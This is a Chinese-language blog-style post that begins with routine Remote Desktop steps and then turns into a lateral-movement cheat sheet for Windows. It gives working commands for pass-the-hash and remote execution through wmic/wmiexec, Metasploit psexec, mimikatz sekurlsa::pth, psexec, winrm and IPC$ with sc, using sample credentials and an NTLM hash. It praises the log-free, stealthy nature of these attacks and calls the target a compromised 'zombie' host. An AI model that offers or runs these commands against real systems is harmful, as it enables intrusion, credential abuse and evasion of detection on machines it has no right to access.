Windows远程执行cmd命令的方法

觉得对自己有用 于是就记录下来了

先说下IIS7远程链接无法连接怎么解决方法!

先来讲下正常远程连接的的方法：

想要进行远程桌面连接，可以同时按住键盘上的windows+R键，调出运行对话框，然后在打开里边输入远程桌面连接命令 mstsc ;

输入远程桌面连接命令mstsc之后，按回车键或者“确定”打开远程桌面连接对话框，我们输入远程电脑或者服务IP地址，然后点击连接即可 ！

点击链接之后，我们输入远程电脑的登录用户名以及密码即可成功连接了。

但是，可以成功连接对方的前提是我们远程桌面连接对方电脑需要设置允许进行远程协助以及允许其他电脑进行远程桌面连接，获取相应权限;而且我们还要知道对方电脑的服务IP地址，一般默认端口是3389，如果对方修改了默认端口，需要在进行远程桌面连接时以“ip地址：端口号”的形式连接;同时对方电脑的账户需要密码，有了相应的账号密码才能进行。

使用微软自带的远程桌面连接也如此麻烦，还不如直接使用远程桌面连接软件

主要这里易操作，并且在运维的时候很好管理，支持批量操作的哈！

这里推荐个自己用的工具，下载地址： 服务器批量管理工具

---

WMI执行命令(普通权限可以进行hash传递)：

无回显执行：wmic /node:192.168.1.158 /user:cbd666 /password:adexx!@#QWE process call create "cmd.exe /c ipconfig>c:\result.txt"

利用wmiexec工具配合进行反弹半交互shell：cscript.exe //nologo wmiexec.vbs /shell 192.168.1.158 Administrator adexx!@#QWE

上面两条命令走的都是135端口，这里的个好处是 攻击无日志，同时攻击脚本无需写入到磁盘，具有极高的隐蔽性！

---

2.使用Hash直接登录Windows（HASH传递）：

抓取windows hash值,得到administrator的hash：

598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

win2008系统以后默认不存储LM hash，所以这里同样可以 32个0来代替LM hash，这里不一定需要32个0，只需要前32位是存在的即可

00000000000000000000000000000000:2D20D252A479F485CDF5E171D93985BF

然后利用msf中psexec模块进行HASH传递：

msf调用payload：
use exploit/windows/smb/psexec
show options
set RHOST 192.168.81.129
set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF
set SMBUser Administrator
show options
run

---

3. mimikatz传递hash方式连接+at计划任务执行命令：

mimikatz.exe privilege::debug "sekurlsa::pth /domain:. /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF" 
//传递hash
dir \\192.168.1.185\c$

---

4.psexec.exe远程执行命令

psexec /accepteula //接受许可协议
sc delete psexesvc
psexec \\192.168.1.185 -u cbd666 -p adexx!@#QWE cmd.exe

Server 2008以及2012中UAC影响着PSEXEC使用！

---

5.winrm远程执行命令

//肉机上面快速启动winrm服务，并绑定到5985端口：
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}
netstat -ano|find "5985"

//客户端连接方式：
winrs -r:http://192.168.1.152:5985 -u:cbd666 -p:adexx!@#QWE "whoami /all"
winrs -r:http://192.168.1.152:5985 -u:cbd666 -p:adexx!@#QWE cmd

//LocalAccountTokenFilterPolicy键，也就是UAC问题,普通管理员登录后也是高权限
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
winrs -r:http://192.168.1.152:5985 -u:cbd666 -p:adexx!@#QWE "whoami /groups"

---

6.IPC命令配合sc命令

net use \\192.168.17.138\c$ "adexx!@#QWE" /user:cbd666
net use
dir \\192.168.17.138\c$
copy test.exe \\192.168.17.138\c$
sc \\192.168.17.138 create test binpath= "c:\test.exe"
sc \\192.168.17.138 start test
sc \\192.168.17.138 del test

这个IPC管道配合SC实际上就是等价于psexec，只不过这里psexec工具直接帮我们自动化完成了这两步！

上面的话自己再讲一点，当我们进行了HASH 传递之后，实际上就是利用 NTLM 身份认证机制来进行验证的，那么只要我们通过了验证，在走445端口的时候会默认验证的NTLM身份，所以说只要HASH传递之后，以上的工具都是相通的，比如你net use \\192.168.17.138 /u:a\cbd666 adexx!@#QWE，直接cscript.exe //nologo wmiexec.vbs /shell 10.10.10.21则直接可以获取到一个半交互式的shell！

Pass The Hash的工具还有很多，但是大多本质是相同的。

比如：

Smbmap
CrackMapExec
Smbexec
Metasploit（exploit/windows/smb/psexec_psh ）
wmiexec
Invoke-WMIExec
Invoke-SMBExec
mimikatz（Overpass-the-hash）